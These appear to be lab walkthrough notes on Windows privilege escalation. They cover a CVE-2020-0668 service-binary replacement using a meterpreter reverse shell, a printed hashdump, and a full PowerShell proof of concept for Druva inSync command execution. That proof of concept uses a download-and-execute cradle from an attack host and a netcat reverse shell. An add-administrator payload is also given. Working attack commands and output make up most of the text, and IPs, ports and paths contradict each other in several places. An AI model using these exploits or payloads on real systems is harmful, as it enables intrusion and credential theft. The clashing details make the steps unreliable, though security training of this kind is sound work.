SeTimeZonePrivilege           Change the time zone                 Disabled

Backup/Restore privileges not assigned — suitable for CVE-2020-0668.

Generate Malicious Payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 645 bytes
Final size of exe file: 7168 bytes

Host Payload

python3 -m http.server 8080

Download Payload (twice)

Download the payload twice so that a second copy is available to replace the first one if it is corrupted when the exploit moves it:

wget http://10.10.14.41:8080/maintenanceservice.exe -O maintenanceservice.exe
wget http://10.10.14.41:8080/maintenanceservice.exe -O maintenanceservice2.exe

Run Exploit

C:\mrci0x1> C:\Tools\CVE-2020-0668\CVE-2020-0668.exe maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
[+] Moving C:\Users\htb-student\Desktop\maintenanceservice.exe to C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

[+] Mounting \RPC Control onto C:\Users\htb-student\AppData\Local\Temp\nzrghuxz.leo
[+] Creating symbol links
[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.
[+] Sleeping for 5 seconds so the changes take effect
[+] Writing phonebook file to C:\Users\htb-student\AppData\Local\Temp\179739c5-5060-4088-a3e7-57c7e83a0828.pbk
[+] Cleaning up
[+] Done!

Verify File Permissions

icacls "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
C:\Program Files (x86)\Mozilla Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(F)
                                                                 BUILTIN\Administrators:(F)
                                                                 WINLPE-WS02\htb-student:(F)

The malicious file now sits at the service path with full control for SYSTEM, Administrators and htb-student.

Replace Corrupt Binary

C:\mrci0x1> copy /Y maintenanceservice2.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Start Metasploit Handler

sudo msfconsole -r handler.rc
       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1123 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

[*] Processing handler.rc for ERB directives.
resource (handler.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (handler.rc)> set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
resource (handler.rc)> set LHOST 10.10.14.41
LHOST => 10.10.14.3
resource (handler.rc)> set LPORT 8443
LPORT => 8443
resource (handler.rc)> exploit
[*] Started HTTPS reverse handler on https://10.10.14.3:8443

Start Service

C:\mrci0x1> net start MozillaMaintenance
The service is not responding to the control function

More help is available by typing NET HELPMSG 2186

The start request times out because the replaced binary is not a real service executable, but the payload has already run.

Meterpreter Session Established

[*] Started HTTPS reverse handler on https://10.10.14.3:8443
[*] https://10.10.14.3:8443 handling request from 10.129.43.13; (UUID: syyuxztc) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (10.10.14.3:8443 -> 10.129.43.13:52047) at 2021-05-14 13:38:55 -0400


meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM


meterpreter > sysinfo

Computer        : WINLPE-WS02
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 6
Meterpreter     : x64/windows


meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb-student:1002:aad3b435b51404eeaad3b435b51404ee:3c0e5d303ec84884ad5c3b7876a06ea6:::
mrb3n:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:c93428723187f868ae2f99d4fa66dceb:::

Full SYSTEM shell obtained.


Vulnerable Services

Enumerating Installed Programs

PS C:\mrci0x1> wmic product get name
Name
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4023057)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
VMware Tools
Druva inSync 6.6.3
Microsoft Update Health Tools
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29910
Update for Windows 10 for x64-based Systems (KB4480730)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127

Enumerating Local Ports

PS C:\mrci0x1> netstat -ano | findstr 6064
  TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324
  TCP    127.0.0.1:6064         127.0.0.1:50274        ESTABLISHED     3324
  TCP    127.0.0.1:6064         127.0.0.1:50510        TIME_WAIT       0
  TCP    127.0.0.1:6064         127.0.0.1:50511        TIME_WAIT       0
  TCP    127.0.0.1:50274        127.0.0.1:6064         ESTABLISHED     3860

Get Process by PID

PS C:\mrci0x1> get-process -Id 3324
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    149      10     1512       6748              3324   0 inSyncCPHwnet64

Get Service Status

PS C:\mrci0x1> get-service | ? {$_.DisplayName -like 'Druva*'}
Status   Name               DisplayName
------   ----               -----------
Running  inSyncCPHService   Druva inSync Client Service

Payload Command (Reverse Shell)

PS C:\mrci0x1> $cmd = "powershell -nop -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.41/shell.ps1')"

Full PowerShell PoC

PS C:\mrci0x1> 
$ErrorActionPreference = "Stop"

# Command the service will execute; shell.ps1 is served from the attack host
$cmd = "powershell -nop -c iex(New-Object Net.WebClient).DownloadString('http://10.10.14.41/shell.ps1')"

# Connect to the inSync client service RPC listener on loopback (port 6064, see netstat above)
$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

# Message frame: fixed protocol header, 4-byte little-endian message type (5),
# 4-byte little-endian length, then the command encoded as UTF-16LE
$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
# The path begins under the inSync4 data directory and traverses out of it to cmd.exe
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd")
$length = [System.BitConverter]::GetBytes($command.Length)

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

$s.Close()

Prepare Reverse Shell Payload (shell.ps1)

Append the following line to the end of Nishang's Invoke-PowerShellTcp.ps1 and save the script as shell.ps1, so that the function is called as soon as the script is downloaded and executed:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443

Serve the shell.ps1 file

mrci0x1@htb$ python3 -m http.server 8080

Bypass Execution Policy

PS C:\mrci0x1> Set-ExecutionPolicy Bypass -Scope Process

Start Netcat Listener

mrci0x1@htb$ nc -lvnp 9443
listening on [any] 9443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.129.43.7] 58611
Windows PowerShell running as user WINLPE-WS01$ on WINLPE-WS01

PS C:\WINDOWS\system32> whoami
nt authority\system

Alternative Payload (Add Admin User)

PS C:\mrci0x1> $cmd = "net user pwnd P@ssw0rd123 /add && net localgroup Administrators pwnd /add"
